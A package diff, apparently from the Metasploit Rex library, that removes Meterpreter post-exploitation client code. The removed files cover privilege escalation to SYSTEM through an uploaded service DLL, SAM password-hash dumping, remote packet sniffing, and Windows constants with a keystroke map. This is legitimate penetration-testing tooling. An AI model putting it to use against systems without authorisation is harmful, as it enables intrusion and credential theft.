librex 0.0.13 → 0.0.15

data/lib/rex/post/meterpreter/extensions/priv/priv.rb

@@ -1,111 +0,0 @@
-#!/usr/bin/env ruby
-
-require 'rex/post/meterpreter/extensions/priv/tlv'
-require 'rex/post/meterpreter/extensions/priv/passwd'
-require 'rex/post/meterpreter/extensions/priv/fs'
-
-module Rex
-module Post
-module Meterpreter
-module Extensions
-module Priv
-
-###
-#
-# This meterpreter extensions a privilege escalation interface that is capable
-# of doing things like dumping password hashes and performing local
-# exploitation.
-#
-###
-class Priv < Extension
-
-	#
-	# Initializes the privilege escalationextension.
-	#
-	def initialize(client)
-		super(client, 'priv')
-
-		client.register_extension_aliases(
-			[
-				{
-					'name' => 'priv',
-					'ext'  => self
-				},
-			])
-
-		# Initialize sub-classes
-		self.fs = Fs.new(client)
-	end
-
-	#
-	# Attempt to elevate the meterpreter to Local SYSTEM
-	#
-	def getsystem( technique=0 )
-		request = Packet.create_request( 'priv_elevate_getsystem' )
-
-		elevator_name = Rex::Text.rand_text_alpha_lower( 6 )
-
-		if( client.platform == 'x64/win64' )
-			elevator_path = ::File.join( Msf::Config.install_root, "data", "meterpreter", "elevator.x64.dll" )
-		else
-			elevator_path = ::File.join( Msf::Config.install_root, "data", "meterpreter", "elevator.dll" )
-		end
-
-		elevator_path = ::File.expand_path( elevator_path )
-
-		elevator_data = ""
-
-		::File.open( elevator_path, "rb" ) { |f|
-			elevator_data += f.read( f.stat.size )
-		}
-
-		request.add_tlv( TLV_TYPE_ELEVATE_TECHNIQUE, technique )
-		request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name )
-		request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data )
-		request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length )
-
-		# as some service routines can be slow we bump up the timeout to 90 seconds
-		response = client.send_request( request, 90 )
-
-		technique = response.get_tlv_value( TLV_TYPE_ELEVATE_TECHNIQUE )
-
-		if( response.result == 0 and technique != nil )
-			client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" )
-			client.sys.config.getprivs
-			client.framework.db.report_note(
-				:host => client.sock.peerhost,
-				:workspace => client.framework.db.workspace,
-				:type => "meterpreter.getsystem",
-				:data => {:technique => technique}
-			) rescue nil
-			return [ true, technique ]
-		end
-
-		return [ false, 0 ]
-	end
-
-	#
-	# Returns an array of SAM hashes from the remote machine.
-	#
-	def sam_hashes
-		# This can take a long long time for large domain controls, bump the timeout to one hour
-		response = client.send_request(Packet.create_request('priv_passwd_get_sam_hashes'), 3600)
-
-		response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/).map { |hash|
-			SamUser.new(hash)
-		}
-	end
-
-	#
-	# Modifying privileged file system attributes.
-	#
-	attr_reader :fs
-
-protected
-
-	attr_writer :fs # :nodoc:
-
-end
-
-end; end; end; end; end
-

data/lib/rex/post/meterpreter/extensions/priv/tlv.rb

@@ -1,28 +0,0 @@
-module Rex
-module Post
-module Meterpreter
-module Extensions
-module Priv
-
-# Passwd
-TLV_TYPE_SAM_HASHES                 = TLV_META_TYPE_STRING | (TLV_EXTENSIONS +   1)
-
-# Fs
-TLV_TYPE_FS_FILE_MODIFIED           = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 100)
-TLV_TYPE_FS_FILE_ACCESSED           = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 101)
-TLV_TYPE_FS_FILE_CREATED            = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 102)
-TLV_TYPE_FS_FILE_EMODIFIED          = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 103)
-TLV_TYPE_FS_FILE_PATH               = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 110)
-TLV_TYPE_FS_SRC_FILE_PATH           = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 111)
-
-# Elevate
-TLV_TYPE_ELEVATE_TECHNIQUE          = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 200)
-TLV_TYPE_ELEVATE_SERVICE_NAME       = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 201)
-TLV_TYPE_ELEVATE_SERVICE_DLL        = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 202)
-TLV_TYPE_ELEVATE_SERVICE_LENGTH     = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 203)
-
-end
-end
-end
-end
-end

data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb

@@ -1,101 +0,0 @@
-#!/usr/bin/env ruby
-
-require 'rex/post/meterpreter/extensions/sniffer/tlv'
-require 'rex/proto/smb/utils'
-
-module Rex
-module Post
-module Meterpreter
-module Extensions
-module Sniffer
-
-###
-#
-# This meterpreter extension can be used to capture remote traffic
-#
-###
-class Sniffer < Extension
-
-
-	def initialize(client)
-		super(client, 'sniffer')
-
-		client.register_extension_aliases(
-			[
-				{ 
-					'name' => 'sniffer',
-					'ext'  => self
-				},
-			])
-	end
-
-
-	# Enumerate the remote sniffable interfaces
-	def interfaces()
-		ifaces = []
-		ifacei = 0
-		request = Packet.create_request('sniffer_interfaces')
-		response = client.send_request(request)
-		response.each(TLV_TYPE_SNIFFER_INTERFACES) { |p|
-			vals  = p.tlvs.map{|x| x.value }
-			iface = { }
-			ikeys = %W{idx name description type mtu wireless usable dhcp}
-			ikeys.each_index { |i| iface[ikeys[i]] = vals[i] }
-			ifaces << iface
-		}		
-		return ifaces
-	end
-	
-	# Start a packet capture on an opened interface
-	def capture_start(intf,maxp=200000,filter="")
-		request = Packet.create_request('sniffer_capture_start')
-		request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
-		request.add_tlv(TLV_TYPE_SNIFFER_PACKET_COUNT, maxp.to_i)
-		request.add_tlv(TLV_TYPE_SNIFFER_ADDITIONAL_FILTER, filter) if filter.length > 0
-		response = client.send_request(request)	
-	end
-	
-	# Stop an active packet capture
-	def capture_stop(intf)
-		request = Packet.create_request('sniffer_capture_stop')
-		request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
-		response = client.send_request(request)	
-	end
-	
-	# Retrieve stats about a current capture
-	def capture_stats(intf)
-		request = Packet.create_request('sniffer_capture_stats')
-		request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
-		response = client.send_request(request)
-		{
-			:packets => response.get_tlv_value(TLV_TYPE_SNIFFER_PACKET_COUNT),
-			:bytes   => response.get_tlv_value(TLV_TYPE_SNIFFER_BYTE_COUNT),
-		}
-	end
-	
-	# Buffer the current capture to a readable buffer
-	def capture_dump(intf)
-		request = Packet.create_request('sniffer_capture_dump')
-		request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
-		response = client.send_request(request, 3600)
-		{
-			:packets => response.get_tlv_value(TLV_TYPE_SNIFFER_PACKET_COUNT),
-			:bytes   => response.get_tlv_value(TLV_TYPE_SNIFFER_BYTE_COUNT),
-		}
-	end
-	
-	# Retrieve the packet data for the specified capture
-	def capture_dump_read(intf, len=16384)
-		request = Packet.create_request('sniffer_capture_dump_read')
-		request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
-		request.add_tlv(TLV_TYPE_SNIFFER_BYTE_COUNT, len.to_i)		
-		response = client.send_request(request, 3600)
-		{
-			:bytes   => response.get_tlv_value(TLV_TYPE_SNIFFER_BYTE_COUNT),
-			:data    => response.get_tlv_value(TLV_TYPE_SNIFFER_PACKET)
-		}
-	end
-		
-end
-
-end; end; end; end; end

data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb

@@ -1,26 +0,0 @@
-module Rex
-module Post
-module Meterpreter
-module Extensions
-module Sniffer
-
-TLV_TYPE_EXTENSION_SNIFFER		= 0
-TLV_TYPE_SNIFFER_INTERFACES		= TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 1)
-TLV_TYPE_SNIFFER_INTERFACE_ID		= TLV_META_TYPE_UINT  | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 2)
-TLV_TYPE_SNIFFER_INTERFACE_HANDLE	= TLV_META_TYPE_UINT  | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 3)
-TLV_TYPE_SNIFFER_PACKET_COUNT		= TLV_META_TYPE_UINT  | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 4)
-TLV_TYPE_SNIFFER_BYTE_COUNT		= TLV_META_TYPE_UINT  | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 5)
-
-TLV_TYPE_SNIFFER_EXCLUDE_PORTS		= TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 6)
-TLV_TYPE_SNIFFER_INCLUDE_PORTS		= TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 7)
-
-TLV_TYPE_SNIFFER_PACKETS		= TLV_META_TYPE_GROUP  | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 8)
-TLV_TYPE_SNIFFER_PACKET			= TLV_META_TYPE_RAW    | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 9)
-
-TLV_TYPE_SNIFFER_ADDITIONAL_FILTER	= TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 10)
-
-end
-end
-end
-end
-end

data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb

@@ -1,333 +0,0 @@
-#!/usr/bin/env ruby
-
-###
-#
-# Windows Specific Constants
-# --------------------------
-#
-# These are put into the global namespace for now
-# so that they can be referenced globally.  
-#
-###
-
-##
-#
-# Permissions
-#
-##
-DELETE                   = 0x00010000
-READ_CONTROL             = 0x00020000
-WRITE_DAC                = 0x00040000
-WRITE_OWNER              = 0x00080000
-SYNCHRONIZE              = 0x00100000
-STANDARD_RIGHTS_REQUIRED = 0x000f0000
-STANDARD_RIGHTS_READ     = READ_CONTROL
-STANDARD_RIGHTS_WRITE    = READ_CONTROL
-STANDARD_RIGHTS_EXECUTE  = READ_CONTROL
-STANDARD_RIGHTS_ALL      = 0x001f0000
-SPECIFIC_RIGHTS_ALL      = 0x0000ffff
-MAXIMUM_ALLOWED          = 0x02000000
-GENERIC_READ             = 0x80000000
-GENERIC_WRITE            = 0x40000000
-GENERIC_EXECUTE          = 0x20000000
-GENERIC_ALL              = 0x10000000
-
-##
-#
-# Page Protections
-#
-##
-PAGE_NOACCESS            = 0x00000001
-PAGE_READONLY            = 0x00000002
-PAGE_READWRITE           = 0x00000004
-PAGE_WRITECOPY           = 0x00000008
-PAGE_EXECUTE             = 0x00000010
-PAGE_EXECUTE_READ        = 0x00000020
-PAGE_EXECUTE_READWRITE   = 0x00000040
-PAGE_EXECUTE_WRITECOPY   = 0x00000080
-PAGE_GUARD               = 0x00000100
-PAGE_NOCACHE             = 0x00000200
-PAGE_WRITECOMBINE        = 0x00000400
-MEM_COMMIT               = 0x00001000
-MEM_RESERVE              = 0x00002000
-MEM_DECOMMIT             = 0x00004000
-MEM_RELEASE              = 0x00008000
-MEM_FREE                 = 0x00010000
-MEM_PRIVATE              = 0x00020000
-MEM_MAPPED               = 0x00040000
-MEM_RESET                = 0x00080000
-MEM_TOP_DOWN             = 0x00100000
-MEM_WRITE_WATCH          = 0x00200000
-MEM_PHYSICAL             = 0x00400000
-MEM_LARGE_PAGES          = 0x20000000
-MEM_4MB_PAGES            = 0x80000000
-SEC_FILE                 = 0x00800000
-SEC_IMAGE                = 0x01000000
-SEC_RESERVE              = 0x04000000
-SEC_COMMIT               = 0x08000000
-SEC_NOCACHE              = 0x10000000
-MEM_IMAGE                = SEC_IMAGE
-
-##
-#
-# Registry Permissions
-#
-##
-KEY_QUERY_VALUE          = 0x00000001
-KEY_SET_VALUE            = 0x00000002
-KEY_CREATE_SUB_KEY       = 0x00000004
-KEY_ENUMERATE_SUB_KEYS   = 0x00000008
-KEY_NOTIFY               = 0x00000010
-KEY_CREATE_LINK          = 0x00000020
-KEY_READ                 = (STANDARD_RIGHTS_READ | KEY_QUERY_VALUE | 
-                            KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY) & ~SYNCHRONIZE
-KEY_WRITE                = (STANDARD_RIGHTS_WRITE | KEY_SET_VALUE | 
-                            KEY_CREATE_SUB_KEY) & ~SYNCHRONIZE
-KEY_EXECUTE              = KEY_READ
-KEY_ALL_ACCESS           = (STANDARD_RIGHTS_ALL | KEY_QUERY_VALUE |
-                            KEY_SET_VALUE | KEY_CREATE_SUB_KEY | 
-                            KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY |
-                            KEY_CREATE_LINK) & ~SYNCHRONIZE
-
-##
-#
-# Registry
-#
-##
-HKEY_CLASSES_ROOT        = 0x80000000
-HKEY_CURRENT_USER        = 0x80000001
-HKEY_LOCAL_MACHINE       = 0x80000002
-HKEY_USERS               = 0x80000003
-HKEY_PERFORMANCE_DATA    = 0x80000004
-HKEY_CURRENT_CONFIG      = 0x80000005
-HKEY_DYN_DATA            = 0x80000006
-
-REG_NONE                 = 0
-REG_SZ                   = 1
-REG_EXPAND_SZ            = 2
-REG_BINARY               = 3
-REG_DWORD                = 4
-REG_DWORD_LITTLE_ENDIAN  = 4
-REG_DWORD_BIG_ENDIAN     = 5
-REG_LINK                 = 6
-REG_MULTI_SZ             = 7
-
-##
-#
-# Process Permissions
-#
-##
-PROCESS_TERMINATE        = 0x00000001
-PROCESS_CREATE_THREAD    = 0x00000002
-PROCESS_SET_SESSIONID    = 0x00000004
-PROCESS_VM_OPERATION     = 0x00000008
-PROCESS_VM_READ          = 0x00000010
-PROCESS_VM_WRITE         = 0x00000020
-PROCESS_DUP_HANDLE       = 0x00000040
-PROCESS_CREATE_PROCESS   = 0x00000080
-PROCESS_SET_QUOTA        = 0x00000100
-PROCESS_SET_INFORMATION  = 0x00000200
-PROCESS_QUERY_INFORMATION= 0x00000400
-PROCESS_SUSPEND_RESUME   = 0x00000800
-PROCESS_ALL_ACCESS       = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFF
-
-##
-#
-# Thread Permissions
-#
-##
-THREAD_TERMINATE            = 0x00000001
-THREAD_SUSPEND_RESUME       = 0x00000002
-THREAD_GET_CONTEXT          = 0x00000008
-THREAD_SET_CONTEXT          = 0x00000010
-THREAD_SET_INFORMATION      = 0x00000020
-THREAD_QUERY_INFORMATION    = 0x00000040  
-THREAD_SET_THREAD_TOKEN     = 0x00000080
-THREAD_IMPERSONATE          = 0x00000100
-THREAD_DIRECT_IMPERSONATION = 0x00000200
-THREAD_ALL_ACCESS           = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x3FF
-
-##
-#
-# Creation flags
-#
-##
-
-CREATE_SUSPENDED            = 0x00000004
-
-##
-#
-# Event Log
-#
-##
-EVENTLOG_SEQUENTIAL_READ    = 0x00000001
-EVENTLOG_SEEK_READ          = 0x00000002
-EVENTLOG_FORWARDS_READ      = 0x00000004
-EVENTLOG_BACKWARDS_READ     = 0x00000008
-
-##
-#
-# Event Log
-#
-##
-EWX_LOGOFF                  = 0
-EWX_SHUTDOWN                = 0x00000001
-EWX_REBOOT                  = 0x00000002
-EWX_FORCE                   = 0x00000004
-EWX_POWEROFF                = 0x00000008
-EWX_FORCEIFHUNG             = 0x00000010
-
-
-##
-#
-# Keyboard Mappings
-#
-##
-
-VirtualKeyCodes = {
-	1 => %W{ LClick },
-	2 => %W{ RClick },
-	3 => %W{ Cancel },
-	4 => %W{ MClick },
-	8 => %W{ Back  },
-	9 => %W{ Tab  },
-	10 => %W{ Newline },
-	12 => %W{ Clear },
-	13 => %W{ Return },
-
-	16 => %W{ Shift },
-	17 => %W{ Ctrl },
-	18 => %W{ Alt },
-	19 => %W{ Pause },
-	20 => %W{ CapsLock },
-
-	27 => %W{ Esc },
-
-	32 => %W{ Space },
-	33 => %W{ Prior },
-	34 => %W{ Next },
-	35 => %W{ End },
-	36 => %W{ Home },
-	37 => %W{ Left },
-	38 => %W{ Up },
-	39 => %W{ Right },
-	40 => %W{ Down  },
-	41 => %W{ Select },
-	42 => %W{ Print },
-	43 => %W{ Execute },
-	44 => %W{ Snapshot },
-	45 => %W{ Insert },
-	46 => %W{ Delete },
-	47 => %W{ Help },
-	48 => %W{ 0  )},
-	49 => %W{ 1  !},
-	50 => %W{ 2  @},
-	51 => %W{ 3  #},
-	52 => %W{ 4  $},
-	53 => %W{ 5  %},
-	54 => %W{ 6  ^},
-	55 => %W{ 7  &},
-	56 => %W{ 8  *},
-	57 => %W{ 9  (},
-	65 => %W{ a  A},
-	66 => %W{ b  B},
-	67 => %W{ c  C},
-	68 => %W{ d  D},
-	69 => %W{ e  E},
-	70 => %W{ f  F},
-	71 => %W{ g  G},
-	72 => %W{ h  H},
-	73 => %W{ i  I},
-	74 => %W{ j  J},
-	75 => %W{ k  K},
-	76 => %W{ l  L},
-	77 => %W{ m  M},
-	78 => %W{ n  N},
-	79 => %W{ o  O},
-	80 => %W{ p  P},
-	81 => %W{ q  Q},
-	82 => %W{ r  R},
-	83 => %W{ s  S},
-	84 => %W{ t  T},
-	85 => %W{ u  U},
-	86 => %W{ v  V},
-	87 => %W{ w  W},
-	88 => %W{ x  X},
-	89 => %W{ y  Y},
-	90 => %W{ z  Z},
-	91 => %W{ LWin },
-	92 => %W{ RWin },
-	93 => %W{ Apps },
-
-	95 => %W{ Sleep },
-	96 => %W{ N0 },
-	97 => %W{ N1 },
-	98 => %W{ N2 },
-	99 => %W{ N3 },
-	100 => %W{ N4 },
-	101 => %W{ N5 },
-	102 => %W{ N6 },
-	103 => %W{ N7 },
-	104 => %W{ N8 },
-	105 => %W{ N9 },
-	106 => %W{ Multiply },
-	107 => %W{ Add },
-	108 => %W{ Separator },
-	109 => %W{ Subtract },
-	110 => %W{ Decimal },
-	111 => %W{ Divide },
-	112 => %W{ F1 },
-	113 => %W{ F2 },
-	114 => %W{ F3 },
-	115 => %W{ F4 },
-	116 => %W{ F5 },
-	117 => %W{ F6 },
-	118 => %W{ F7 },
-	119 => %W{ F8 },
-	120 => %W{ F9 },
-	121 => %W{ F10 },
-	122 => %W{ F11 },
-	123 => %W{ F12 },
-	124 => %W{ F13 },
-	125 => %W{ F14 },
-	126 => %W{ F15 },
-	127 => %W{ F16 },
-	128 => %W{ F17 },
-	129 => %W{ F18 },
-	130 => %W{ F19 },
-	131 => %W{ F20 },
-	132 => %W{ F21 },
-	133 => %W{ F22 },
-	134 => %W{ F23 },
-	135 => %W{ F24 },
-	144 => %W{ NumLock },
-	145 => %W{ Scroll },
-	160 => %W{ LShift },
-	161 => %W{ RShift },
-	162 => %W{ LCtrl },
-	163 => %W{ RCtrl },
-	164 => %W{ LMenu },
-	165 => %W{ RMenu },
-	166 => %W{ Back },
-	167 => %W{ Forward },
-	168 => %W{ Refresh },
-	169 => %W{ Stop },
-	170 => %W{ Search },
-	171 => %W{ Favorites },
-	172 => %W{ Home },
-	176 => %W{ Forward },
-	177 => %W{ Reverse },
-	178 => %W{ Stop },
-	179 => %W{ Play },
-	186 => %W{ ;  :},
-	187 => %W{ =  +},
-	188 => %W{ ,  <},
-	189 => %W{ -  _},
-	190 => %W{ .  >},
-	191 => %W{ /  ?},
-	192 => %W{ '  ~},
-	219 => %W| [  {|,
-	220 => %W{ \  |},
-	221 => %W| ]  }|,
-	222 => %W{ '  Quotes},
-}